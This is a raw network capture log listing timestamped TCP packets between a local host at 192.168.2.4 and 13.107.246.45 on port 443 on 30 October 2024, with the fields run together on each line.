Oct 30, 2024 03:46:38.183401108 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.186022997 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.186043978 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.186103106 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.186233044 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.186249018 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.202430010 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.202568054 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.202630997 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.202672005 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.202683926 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.202693939 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.202697992 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.204591036 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.204652071 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.204725981 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.204881907 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.204915047 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.240742922 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.240912914 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.241003036 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.241309881 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.241338968 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.241364956 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.241380930 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.252466917 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.252497911 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.252562046 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.252856970 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.252873898 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.896089077 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.896528959 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.896548033 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.897017956 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.897022963 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.914774895 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.915246010 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.915343046 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.915756941 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.915774107 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.916903973 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.917227983 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.917252064 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.917696953 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.917702913 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.936645031 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.940164089 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.940191031 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.940558910 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.940563917 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.993696928 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.011883020 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.011933088 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.012337923 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.012352943 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.027157068 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.027491093 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.027549028 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.027638912 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.027652979 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.027667999 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.027672052 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.033119917 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.033150911 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.033209085 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.036000013 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.036015987 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.042591095 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.042788029 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.042849064 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.043869019 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.043905020 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.043932915 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.043947935 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.046408892 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.046556950 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.046628952 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.047508955 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.047528028 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.047542095 CET49788443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.047549009 CET4434978813.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.065943956 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.066215992 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.066284895 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.066764116 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.066790104 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.066857100 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.066871881 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.066871881 CET49789443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.066884041 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.066891909 CET4434978913.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.067056894 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.067070961 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.071074009 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.071147919 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.071228027 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.071448088 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.071480989 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.072360992 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.072379112 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.073939085 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.074222088 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.074234009 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.140785933 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.140991926 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.141072989 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.141272068 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.141289949 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.141303062 CET49790443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.141310930 CET4434979013.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.143403053 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.143485069 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.143568993 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.143693924 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.143728018 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.769160986 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.769737005 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.769752026 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.770234108 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.770240068 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.801943064 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.802367926 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.802386999 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.802831888 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.802839994 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.824350119 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.824681044 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.824743986 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.825035095 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.825048923 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.840182066 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.840572119 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.840588093 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.840924978 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.840931892 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.882716894 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.883428097 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.883497953 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.883779049 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.883793116 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.899190903 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.899277925 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.899463892 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.899503946 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.899519920 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.899530888 CET49791443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.899535894 CET4434979113.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.902359009 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.902398109 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.902493954 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.902643919 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.902659893 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.929177046 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.929510117 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.929578066 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.929610014 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.929610014 CET49794443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.929625988 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.929636955 CET4434979413.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.932005882 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.932020903 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.932086945 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.932207108 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.932214022 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.957762957 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.957832098 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.957989931 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.958051920 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.958051920 CET49793443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.958089113 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.958112001 CET4434979313.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.960417032 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.960442066 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.960534096 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.960632086 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.960649014 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.978666067 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.978879929 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.978981972 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.979149103 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.979149103 CET49792443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.979161978 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.979170084 CET4434979213.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.981142044 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.981151104 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:39.981225014 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.981331110 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:39.981339931 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.013195992 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.013344049 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.013639927 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.013639927 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.013639927 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.016350985 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.016364098 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.016448975 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.016619921 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.016632080 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.319129944 CET49795443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.319200039 CET4434979513.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.672404051 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.681587934 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.690921068 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.690949917 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.691395998 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.691402912 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.691648006 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.691659927 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.692013025 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.692018032 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.693141937 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.693377018 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.693393946 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.693743944 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.693749905 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.720666885 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.723299026 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.723309994 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.723721981 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.723726988 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.754009962 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.756021976 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.756047964 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.756460905 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.756465912 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.820234060 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.820447922 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.820545912 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.820818901 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.820828915 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.820838928 CET49797443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.820846081 CET4434979713.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.821906090 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.822618961 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.822691917 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.822761059 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.822832108 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.822879076 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.824127913 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.824163914 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.824242115 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.831526041 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.831540108 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.831573963 CET49798443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.831581116 CET4434979813.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.831695080 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.831707954 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.831737041 CET49796443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.831742048 CET4434979613.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.832910061 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.832921028 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.834973097 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.834994078 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.835716009 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.836117029 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.836131096 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.836297989 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.836313009 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.836330891 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.836462021 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.836472988 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.848953962 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.849189997 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.849262953 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.849494934 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.849499941 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.849534988 CET49799443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.849539042 CET4434979913.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.851335049 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.851350069 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.851706028 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.851816893 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.851835012 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.883200884 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.883249998 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.883333921 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.884505987 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.884512901 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.884522915 CET49800443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.884526968 CET4434980013.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.886934996 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.886955023 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:40.887029886 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.896907091 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:40.896918058 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.565855980 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.566288948 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.566304922 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.566837072 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.566848040 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.574486017 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.574909925 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.574928045 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.575330973 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.575335979 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.577231884 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.577691078 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.577703953 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.577941895 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.577945948 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.591475964 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.591797113 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.591814041 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.592180967 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.592185974 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.633105993 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.633824110 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.633836031 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.634407997 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.634413004 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.693958998 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.694242954 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.694569111 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.701165915 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.701165915 CET49801443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.701185942 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.701196909 CET4434980113.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.704787016 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.704933882 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.707703114 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.709758043 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.709863901 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.709909916 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.720602989 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.720814943 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.720897913 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.725122929 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.725122929 CET49803443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.725136995 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.725147009 CET4434980313.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.729466915 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.729476929 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.729487896 CET49804443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.729492903 CET4434980413.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.730376959 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.730386019 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.730422020 CET49802443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.730427027 CET4434980213.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.754859924 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.754874945 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.754965067 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.756299973 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.756339073 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.756586075 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.757548094 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.757575989 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.757646084 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.757844925 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.757857084 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.759984970 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.759999037 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.760126114 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.760262012 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.760274887 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.760437012 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.760449886 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.760555983 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.760567904 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.765822887 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.766089916 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.766149044 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.766222954 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.766231060 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.766258955 CET49805443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.766263008 CET4434980513.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.769104004 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.769113064 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:41.769211054 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.769325972 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:41.769340038 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.497733116 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.498202085 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.498219967 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.498667955 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.498672962 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.500346899 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.500824928 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.500838041 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.501271009 CET49806443192.168.2.413.107.246.45
